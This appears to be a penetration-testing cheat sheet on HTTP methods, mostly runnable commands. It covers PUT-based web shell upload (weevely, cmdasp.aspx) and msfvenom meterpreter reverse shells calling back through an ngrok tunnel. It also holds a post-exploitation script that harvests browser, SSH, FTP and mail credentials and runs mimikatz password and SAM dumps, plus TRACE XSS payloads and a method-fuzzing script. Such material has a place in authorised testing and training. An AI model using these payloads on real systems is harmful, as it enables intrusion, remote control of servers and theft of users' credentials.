HTTP Methods
Check List
Methdology
HTTP Methods
1
We run the following command to identify the active methods on the target using the Curl tool
2
We can do this by using the Nmap tool to identify the active methods on the target
3
We can do this by using the Nmap tool to identify the active methods on the target. After executing the command, if the PUT method is active on the target, using the next command, we try to upload a php file to the target to get RCE
4
If our file is uploaded to the specified path using the PUT method, the site is vulnerable
XSS in Trace Method (Black Box)
1
first Check if the Server Supports TRACE Send a simple TRACE request to check if the server responds
2
If the server supports the Trace method, the next step is to inject JavaScript code
3
Modify the request by injecting an XSS payload inside the Via header If the server reflects this payload in its response without sanitization, it may be vulnerable to XSS
4
Cheat Sheet
Discover the Supported Methods
curl -X OPTIONS -I $WEBSITEcurl -X PUT -d "<?php phpinfo(); ?>" $WEBSITE/phpinfo.phpnmap -sS -sV --mtu 5000 --script http-methods $WEBSITEPUT Method
weevely generate 00980098 /tmp/unk9vvn.phpcp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspxcurl -X PUT $WEBSITE/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"weevely "$WEBSITE/uploads/index.php" 00980098curl -X PUT $WEBSITE/uploads/index.aspx \
--upload-file /tmp/unk9vvn.aspx \
-H "Content-Type: application/x-aspx"curl "$WEBSITE/uploads/index.aspx?cmd=whoami"msfconsole -qx "
use auxiliary/scanner/http/options;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
run -j"msfconsole -qx "
use auxiliary/scanner/http/http_put;
set RHOSTS $WEBSITE;
set RPORT 443;
set SSL true;
set PATH /uploads;
run -j"nohup ngrok tcp 4444 >/dev/null 2>&1 &NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOFmsfvenom -p php/meterpreter/reverse_tcp \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f raw \
-e php/base64 -i 3 \
-o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.phpmsfvenom -p windows/meterpreter/reverse_winhttps \
LHOST=$NGHOST \
PORT=$NGPORT \
EnableStageEncoding=true \
-f asp > /tmp/unk9vvn.aspxmsfconsole -qx "
use multi/handler;
set PAYLOAD php/meterpreter/reverse_tcp;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"msfconsole -qx "
use multi/handler;
set PAYLOAD windows/meterpreter/reverse_winhttps;
set LHOST $NGHOST;
set LPORT $NGPORT;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"curl -X PUT $WEBSITE/wp-content/uploads/index.php \
--upload-file /tmp/unk9vvn.php \
-H "Content-Type: application/x-php"Access Control Bypass
sudo nano http-methods-fuzzer.sh#!/bin/bash
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <WEBSITE>"
exit 1
fi
WEBSITE="$1"
# Validate URL format
if ! [[ "$WEBSITE" =~ ^https?:// ]]; then
echo "Error: WEBSITE must start with http:// or https://"
exit 1
fi
# Create temporary files
KATANA_OUTPUT=$(mktemp)
URLS_FILE=$(mktemp)
COOKIE_FILE=$(mktemp)
# Cleanup function
cleanup()
{
rm -f "$KATANA_OUTPUT" "$URLS_FILE" "$COOKIE_FILE"
}
trap cleanup EXIT
# Run katana to gather URLs
katana -u $WEBSITE \
-fr "(static|assets|img|images|css|fonts|icons)/" \
-o "$KATANA_OUTPUT" \
-xhr-extraction \
-automatic-form-fill \
-silent \
-strategy breadth-first \
-js-crawl \
-extension-filter jpg,jpeg,png,gif,bmp,tiff,tif,webp,svg,ico,css \
-headless --no-sandbox \
-known-files all \
-field url \
-sf url
# Filter and clean extracted URLs
sed -E 's/\?.*//; s/\.aspx$//; s/\/[^/]+\.json$//' "$KATANA_OUTPUT" | grep -Ev '\.js$|&' | sort -u > "$URLS_FILE"
# User-Agent and headers
USER_AGENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
HEADERS=(
"User-Agent: $USER_AGENT"
"Accept: */*"
"Accept-Language: en-US,fa-IR;q=0.5"
"Accept-Encoding: gzip, deflate, br, zstd"
"Connection: keep-alive"
"Upgrade-Insecure-Requests: 1"
"Sec-Fetch-Dest: script"
"Sec-Fetch-Mode: no-cors"
"Sec-Fetch-Site: cross-site"
"DNT: 1"
"Sec-GPC: 1"
"Priority: u=0, i"
"Te: trailers"
)
# Extract cookies
COOKIES=$(curl -s -I "$WEBSITE" | awk 'BEGIN {IGNORECASE=1} /^set-cookie:/ {print substr($0, 13)}' | awk -F';' '{print $1}' | tr '\n' '; ' | sed 's/; $//')
# Append cookies if available
if [[ -n "$COOKIES" ]]; then
HEADERS+=("Cookie: $COOKIES")
fi
# Convert headers into ffuf parameters
HEADER_PARAMS=()
for HEADER in "${HEADERS[@]}"; do
HEADER_PARAMS+=("-H" "$HEADER")
done
# Run ffuf
echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt
ffuf -w "$URLS_FILE":URL \
-w /tmp/methods.txt:METHODS \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-r -c -mc 200 \
"${HEADER_PARAMS[@]}"sudo chmod +x http-methods-fuzzer.sh;sudo ./http-methods-fuzzer.sh $WEBSITECross-Site Tracing Potential
ffuf -w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X TRACE \
-H "Custom-Test-Header: <scipt>alert('unk9vvn')</script>" \
-r -c -mc 200 -mr "unk9vvn"HTTP Method Overriding
echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
-w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-H "X-HTTP-Method: METHODS" \
-r -c -mc 200echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
-w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-H "X-HTTP-Method-Override: METHODS" \
-r -c -mc 200echo -e "GET\nPOST\nPUT\nDELETE\nHEAD\nOPTIONS\nTRACE\nCONNECT\nPATCH" > /tmp/methods.txt; \
ffuf -w /tmp/methods.txt:METHODS \
-w /tmp/urls.txt:URL \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \
-u URL/DIR \
-X METHODS \
-H "X-Method-Override: METHODS" \
-r -c -mc 200Last updated